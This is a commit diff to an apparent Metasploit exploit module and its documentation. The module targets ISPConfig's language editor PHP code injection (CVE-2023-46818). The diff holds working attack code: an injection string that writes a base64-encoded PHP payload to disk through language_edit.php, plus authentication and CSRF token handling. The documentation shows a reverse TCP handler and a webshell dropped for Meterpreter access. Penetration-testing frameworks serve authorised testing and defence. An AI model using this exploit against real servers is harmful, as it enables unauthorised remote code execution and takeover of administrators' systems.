resolved: issues

happybear-21 · happybear-21 · commit 840ae0f317b2 · 2025-06-27T19:42:35.000+05:30
diff --git a/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md b/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
@@ -1,6 +1,8 @@
 ## Vulnerable Application
 
-ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the `admin_allow_langedit` option is enabled. An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
+ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the
+`admin_allow_langedit` option is enabled.
+An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
 
 - Vendor Advisory: https://www.ispconfig.org/
 - CVE: [CVE-2023-46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
@@ -30,9 +32,6 @@ The ISPConfig administrator username to authenticate with.
 ### PASSWORD
 The ISPConfig administrator password to authenticate with.
 
-### TARGETURI
-The base path to ISPConfig (default: `/`).
-
 ### LOGIN_TIMEOUT
 Timeout for login request (default: 15 seconds).
 
@@ -54,7 +53,7 @@ password => adminpass
 msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
 
 [*] Started reverse TCP handler on 192.168.1.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running automatic check ('set AutoCheck false' to disable)
 [+] ISPConfig installation detected
 [*] Attempting login with username 'admin' and password 'adminpass'
 [+] Login successful!
@@ -75,4 +74,4 @@ Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 20
 ## Notes
 - The module requires valid ISPConfig admin credentials and the `admin_allow_langedit` option enabled.
 - The shell is removed after exploitation if `DELETE_SHELL` is true.
-- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access. 
+- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access.
diff --git a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -20,7 +20,8 @@ def initialize(info = {})
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'syfi' # Discovery and PoC
+          'syfi', # Discovery and PoC
+          'Egidio Romano'
         ],
         'References' => [
           ['CVE', '2023-46818'],
@@ -67,6 +68,39 @@ def check
       'uri' => normalize_uri(target_uri.path, 'login')
     })
     return CheckCode::Unknown unless res
+
+    # Try to log in and parse version if credentials are provided
+    if datastore['USERNAME'] && datastore['PASSWORD']
+      login_res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'login'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          's_mod' => 'login'
+        },
+        'keep_cookies' => true
+      })
+      if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
+        # Try to access the dashboard or settings page
+        settings_res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+          'keep_cookies' => true
+        })
+        if settings_res
+          doc = settings_res.get_html_document
+          # Try to find version in a span, div, or similar element
+          version_text = doc.text[/ISPConfig\s*v?(\d+\.\d+(?:\.\d+)?(?:p\d+)?)/i, 1]
+          if version_text
+            print_good("ISPConfig version detected: #{version_text}")
+            return CheckCode::Appears("Version: #{version_text}")
+          end
+        end
+      end
+    end
+
+    # Fallback to the previous check
     if res.body.include?('ISPConfig') && (res.body.include?('login') || res.body.include?('username') || res.body.include?('password'))
       print_good('ISPConfig installation detected')
       return CheckCode::Detected
@@ -87,10 +121,16 @@ def authenticate
       'keep_cookies' => true
     })
     fail_with(Failure::NoAccess, 'Login request failed') unless res
+    if res&.code == 302
+      res = send_request_cgi({
+        'method' => 'GET',
+         'uri' => normalize_uri(target_uri.path, 'login/',res&.headers.fetch('Location',nil))
+      })
+    end
     if res.body.match(/Username or Password wrong/i)
       fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
     end
-    if res.headers['Location'] && res.headers['Location'].include?('admin') ||
+    if res.headers.fetch('Location',nil)&.include?('admin') ||
        res.body.downcase.include?('dashboard')
       print_good('Login successful!')
       return true
@@ -102,8 +142,7 @@ def authenticate
   def inject_payload
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
-    php_payload = payload.encoded
-    injection = "'];file_put_contents('#{@payload_file}','<?php #{php_payload} ?>');die;#"
+    injection = %<'];file_put_contents('#{@payload_file}',base64_decode('#{Base64.strict_encode64(payload.encoded)}');die;#"
     lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
@@ -118,13 +157,12 @@ def inject_payload
       'keep_cookies' => true
     })
     fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
-    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
-    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
-    unless csrf_id_match && csrf_key_match
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    unless csrf_id && csrf_key
       fail_with(Failure::UnexpectedReply, 'CSRF tokens not found!')
     end
-    csrf_id = csrf_id_match[1]
-    csrf_key = csrf_key_match[1]
     print_good("Extracted CSRF tokens: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
     injection_data = {
       'lang' => 'en',
@@ -155,7 +193,7 @@ def trigger_payload(payload_url)
       'uri' => payload_url,
       'keep_cookies' => true
     })
-    if res && res.code == 200
+    if res&.code == 200
       print_good('PHP payload triggered successfully')
     else
       print_warning('Payload trigger response was unexpected')
@@ -181,11 +219,10 @@ def cleanup
       'keep_cookies' => true
     })
     return unless res
-    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
-    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
-    return unless csrf_id_match && csrf_key_match
-    csrf_id = csrf_id_match[1]
-    csrf_key = csrf_key_match[1]
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    return unless csrf_id && csrf_key
     injection_data = {
       'lang' => 'en',
       'module' => 'help',
